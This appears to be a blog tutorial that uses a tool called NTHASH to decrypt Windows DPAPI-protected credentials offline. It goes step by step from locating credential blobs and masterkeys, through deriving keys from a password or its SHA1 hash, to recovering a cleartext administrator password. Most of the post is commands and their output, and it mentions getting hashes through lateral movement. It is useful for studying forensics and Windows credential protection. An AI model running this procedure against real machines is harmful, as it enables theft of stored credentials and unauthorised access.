Lets decrypt a user credentials (which happen to be enctyped in dpapi blobs).
5 steps:
-look at the encrypted blob/credential
-look at the encrypted masterkey
-retrieve the sha1 user password and compute the sha1-hmac key
-decrypt the encrypted masterkey
-decrypt the encrypted blob/credential
-conclusion
1/look at the encrypted blob/credential
User credentials are located here:
C:\Users\username\AppData\Roaming\Microsoft\Credentials
C:\Users\username\AppData\Local\Microsoft\Credentials
NTHASH-win64.exe /decodeblob
/binary:C:\Users\erwan\AppData\Roaming\Microsoft\Credentials\444F0F078CB16849842B0928EF18C7E1
->note the dwFlags:0 = user
We can see it is using masterkey ae222549-867a-4269-b29f-49500e8842c8.
2/look at the encrypted masterkey
Masterkeys are located here:
C:\Users\username\AppData\Roaming\Microsoft\Protect\sid
NTHASH-win64.exe /decodemk
/binary:C:\Users\erwan\AppData\Roaming\Microsoft\Protect\S-1-5-21-2427513087-2265021005-1965656450-1001\ae222549-867a-4269-b29f-49500e8842c8
3/retrieve the sha1 user password and compute the sha1-hmac key
To decrypt this masterkey, you either know the cleartext password or you know its SHA1 form (retrieved thru some other lateral movements).
If you know the cleartext password, then lets computer its SHA1.
Skip the below if you already have the SHA1 password.
NTHASH-win64.exe /widestringtohexa /input:Password12345
NTHASH 1.7 x64 by erwan2212@gmail.com
widestringtobyte
500061007300730077006F007200640031003200330034003500
NTHASH-win64.exe /gethash /mode:SHA1 /input:5500061007300730077006F007200640031003200330034003500
NTHASH 1.7 x64 by erwan2212@gmail.com
gethash
0D32ECD47EDA6A1D3FFA259089B59798DE1D7CE0
Note that you can run the 2 previous commands in one go :
NTHASH-win64.exe /widestringtohexa /input:Password12345 | NTHASH-win64.exe /gethash /mode:SHA1
Now, lets compute the sha1-hmac key to decrypt the masterkey.
For this we need the SHA1 password + user sid.
NTHASH-win64.exe /widestringtohexa /input:S-1-5-21-2427513087-2265021005-1965656450-1001\0
NTHASH 1.8 x64 by erwan2212@gmail.com
widestringtobyte
53002D0031002D0035002D00320031002D0032003400320037003500310033003000380037002D0032003200360035003000320031003000300035002D0031003900360035003600350036003400350030002D0031003000300031000000
(Note the \0 to make it a null widechar terminated string)
NTHASH-win64.exe /gethmac /mode:SHA1 /key:0D32ECD47EDA6A1D3FFA259089B59798DE1D7CE0
/input:530020031002D0035002D00320031002D0032003400320037003500310033003000380037002D0032003
00360035003000320031003000300035002D0031003900360035003600350036003400350030002
0031003000300031000000
NTHASH 1.7 x64 by erwan2212@gmail.com
gethmac
262FA2EFDE8F5C9F525DAD764B6710D663BA5DA5
4/decrypt the encrypted masterkey
NTHASH-win64.exe /decodemk
/binary:C:\Users\erwan\AppData\Roaming\Microsoft\Protect\S-1-5-21-2427513087-2265021005-1965656450-1001\ae222549-867a-4269-b29f-49500e8842c8
/input:262FA2EFDE8F5C9F525DAD764B6710D663BA5DA5
NTHASH 1.7 x64 by erwan2212@gmail.com
**** Unprotecting Blob ****
KEY:83D3D812E50FAB6F83DA070D6C566DCFE3248A1AD873AA1D222F6B41342890EEBD790388FE2A
21680A081723AA0C7B39EFBA5B16BB5D948B947140838F1F5383
SHA1:38920930CFB2A1CE61F9CB52153025535F548F53
Note : with latest version you can skip step 3 and execute the below (i.e provide the SHA1 user password and let NTHASH compute the hmac):
nthash-win64 /decodemk
/binary:C:\Users\erwan\AppData\Roaming\Microsoft\Protect\S-1-5-21-2427513087-2265021005-1965656450-1001\75380869-42A8-42EC-9E9B-8518F42802EE
/password:0D32ECD47EDA6A1D3FFA259089B59798DE1D7CE0
5/decrypt the encrypted blob/credential
nthash-win64 /decodeblob
/binary:C:\Users\erwan\AppData\Roaming\Microsoft\Credentials\444F0F078CB16849842B0928EF18C7E1
/input:38920930CFB2A1CE61F9CB52153025535F548F53
NTHASH 1.7 x64 by erwan2212@gmail.com
**** Decoding Cred Blob ****
credFlags:48
credSize:194
Type:2
Flags:0
LastWritten:15/12/2019 19:16:09
TargetName:Domain:target=192.168.1.188
unkdata:
comment:SspiPfc
targetalias:
username:ERWAN-PC2\administrateur
CredentialBlob:weakpassword
You can run it in one command eventually:
nthash-win64 /decodemk
/binary:C:\Users\erwan\AppData\Roaming\Microsoft\Protect\S-1-5-21-2427513087-2265021005-1965656450-1001\75380869-42A8-42EC-9E9B-8518F42802EE
/password:0D32ECD47EDA6A1D3FFA259089B59798DE1D7CE0 | nthash-win64 /decodeblob
/binary:C:\Users\erwan\AppData\Roaming\Microsoft\Credentials\444F0F078CB16849842B0928EF18C7E1
6/Conclusion ?
You dont need to be online or run as the user to retrieve secrets :
If you own a blob, its associated masterkey and the cleartext password OR the sha1 password, you can decrypt these offline.
[…] the masterkey (identified by its guid in previous steps) See previous article for more details about this […]
[…] there (and using the same steps as in this article): -use /decodeblob to identify the masterkey guid -use /decodemk to decrypt the masterkey -use […]